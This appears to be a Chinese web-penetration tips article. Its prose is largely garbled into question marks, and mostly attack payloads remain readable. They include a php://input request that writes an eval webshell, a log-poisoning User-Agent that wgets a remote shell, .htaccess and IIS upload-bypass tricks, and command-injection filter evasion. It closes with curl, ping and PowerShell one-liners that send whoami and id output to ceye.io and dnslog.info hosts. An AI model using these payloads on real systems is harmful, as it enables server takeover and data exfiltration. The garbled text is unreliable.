??????????????????????????????е??ЩС??????????ο???
????0x01 PHP???????
?????????????????????:???????????????????????????????????
????????php???Э?? php://input ?? data:// : ??????post???????php???????.
????http://example.com/test.php?url=php://input
????POST:<?php fwrite(fopen("shell.php"??"w")??'<?php eval($_POST["pass"]);?>')?>
????????log??????:?????????????????????????????????????getshell(?ж????)??
????apache???????? /etc/httpd/logs/access_log ;
?????????????в???PHP????
????????? :???burpsuit??????? ??????????????<>
?????????? :curl ??????????url
????curl http://example/shell.php?= <?php phpinfo();?>
????????php????д??log?????? ????????????
????http://127.0.0.1/lfi/index.php?page=/etc/httpd/logs/access_log
????????/proc/self/environ???:?????PHP?????????????? cgion/proc α?????????PHP????????????Щα?????
??????дUser-Agent??????£?<?system('wget http://eyidaima/shell.txt -O shell.php');?>
?????????????:??????????????????е??κ??????????????????? phpinfo(?? ???????????????serializedsession?????PHP????????????????????? /tmp/sess_SESSIONID ???????
??????????????php???????????:????????????????????????????????????????????????????????????ó???????????
????0x02 ???? .htaccess ????????????
????.htaccess ?????Apache???????е?????????????????????????μ???????á?????? .htaccess ????????????£?
????<FileMatch “shell.jpg”>
????SetHandler application/x-httpd-php
????</FileMatch>
????????£???????shell.jpg?????????????仰???????????????
????0x03 PHP???????????
??????????????????????????
????<?php
????$a = $_GET['file'];
????include $a.'.html.php';
?????>
???????????? %00 ??????? ?????? xxxx.html.php ?????????????? hello.html.php ??????? phpinfo() ;
????????????zip
?????????????????????????????????????? hello.html.php
????http://example/index.php?file=zip://test.zip%23hello
????????????????????include???????????????? zip://test.zip#hello.html.php
?????????????μ? test.zip ?????????? hello.html.php ??????????????
????0x04 ??÷??????getshell
??????????????????????????????????????????ip????????????????????????????????????????? sqlin.asp ??
???????????????
???????????????∨≡??? ???? a (????????:ANSI->Unicode???????UNICODE2ANSI)
?????? and 1= ???????????∨≡???
??????????? sqlin.asp ???ɡ?
????0x05 iis+php????????????
?????????????P?
??????php+window+iis??????:
?????????==???;
???????????==???;
????С?????(“<”)==???(“*”);
????????????????????????????????????????????????????????.????P??????????????????????
?????·???£?
????1??????e??“??”???
????2??????“<”==“*”??????????
??????????????????????????????????????????????? %00 ?? : ??????磺 bypass.php:jpg
????????e?????????????????????沢???????κε??????????????php???????????????????php??????????????????????????????????????????????????.
????1??????????e?????????????????php?????????????? bypass.php:jpg ??????????????????? bypass.php ????php?????
????2?????????????????????????? < ???? * ???? * ???????????burp??????????? bypass.<<< ???????仰???????????????????????仰???? bypass.php ?????
????0x06 ??????????
????1??escapeshellcmd?? escapeshellcmd() ????????п??????? shell?????????????????????????塣 ?????????????????????????? exec() ?? system() ????????????в??????????????? ^ ?????? %1a ???????????????????
????2???????????
???????ls????
????a=l;b=s;$a$b
????cat hello????????
????a=c;b=at;c=he;d=llo;$a$b ${c}$asrjhpx
????3????????
??????????
????${IFS}
????cat${IFS}hello
??????????????????????????????
????<>
????cat<>hello
????4???????
???????????????????????????????sql??xxe??xss??????????????????dns/http?????????????
????linux??
????curl xxxx.ceye.io/`whoami`
????ping -c 1 `whoami`.xxxx.ceye.io
??????????????????????????????????????Щ????????????base64
????curl http://xxxx.ceye.io/$(id|base64)
????windows:
????http????
????for /F %x in ('whoami') do start http://xxx.ceye.io/%x
????dns????
????????????????for /F "delims=" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info
??????????????for /F "delims= tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info
??????powershell??base64????
????for /F %x in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%x'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xxx.ceye.io/'+$a);